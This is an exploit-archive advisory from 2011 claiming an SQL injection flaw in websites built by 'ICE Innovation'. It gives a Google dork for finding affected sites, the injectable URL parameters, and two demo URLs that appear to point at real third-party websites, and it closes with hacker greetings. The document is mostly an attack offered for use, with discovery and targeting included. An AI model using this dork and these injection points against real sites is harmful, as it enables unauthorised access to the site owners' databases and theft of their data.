ICE Innovation =>SQL injection vulnerability



EKU-ID: 505 CVE: OSVDB-ID:
Author: Sideswipe Published: 2011-06-14 Verified: Not Verified
Download:

Rating

☆☆☆☆☆
Home


============================================================
# Title: ICE Innovation =>SQL injection vulnerability
# Date:10/6/11
# Author: Sideswipe
# Home: www.pro2leet.net or www.alboraaq.com or www.indishell.in
# Category: Web apps
# Dork: intext:"Design & Development by ICE Innovation"
# Tested On : Xp and windows 7
===========================================================

[-] Exploit:~

      #http://www.[localhost].com/section.asp?section_id=65
      #http://www.[localhost].com/section.asp?section_id=(sql)

     #http://www.[localhost].com/section.asp?id=60
     #http://www.[localhost].com/section.asp?id=(sql)

[-] Demo:~

     #http://http://www.infinitus-pg.com/articles-subcats.php?cat=65'
    #http://www.spa1877.com/about.php?cat=60'
  

(^_^)GOOD LUCK ALL(^_^)
====================++Greetz to++===========================
T3es,underscore,loyal_boy,!-Bb0yH4cK3r_Dz-!,hackcore,saxxor
,j|nx,Foxmind,Cyberseller,Anthrax,shani,anthrax,Ratchet,starlash,
ssgodfather,xConsole,balazee,Hexcoder,balazee,krishandpatill
                                And all my friends
===========================================================